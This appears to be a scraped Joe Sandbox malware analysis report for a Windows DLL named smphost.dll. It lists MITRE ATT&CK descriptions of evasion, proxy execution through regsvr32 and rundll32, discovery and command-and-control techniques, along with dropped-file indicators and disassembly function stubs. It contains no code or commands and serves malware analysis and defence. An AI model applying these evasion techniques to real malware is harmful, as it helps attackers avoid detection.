Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. Regsvr32.exe is also a Microsoft signed binary.
Tactics:	Defense Evasion
Data Sources:	Loaded DLLs, Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report smphost.dll

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Overview

Sigma Overview

System Summary

Persistence and Installation Behavior

Jbx Signature Overview

AV Detection

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\6\5507.ocx

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_regsvr32.exe_e8da9d9d47a999f039c77c46f5a596d8854d75e_7a325c51_195cb6b3\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1E8B.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER2AB2.tmp.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERFBA1.tmp.dmp

C:\Windows\appcompat\Programs\Amcache.hve

C:\Windows\appcompat\Programs\Amcache.hve.LOG1

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Exports

Windows Analysis Report
smphost.dll

Function 6E9E8210 Relevance: 7.6, APIs: 5, Instructions: 144
networkCOMMON

Function 6E9E93FD Relevance: 10.6, APIs: 7, Instructions: 136
COMMONLIBRARYCODE

Function 6E9E94AD Relevance: 7.6, APIs: 5, Instructions: 87
COMMONLIBRARYCODE

Function 6E9E5D90 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 193
libraryCOMMON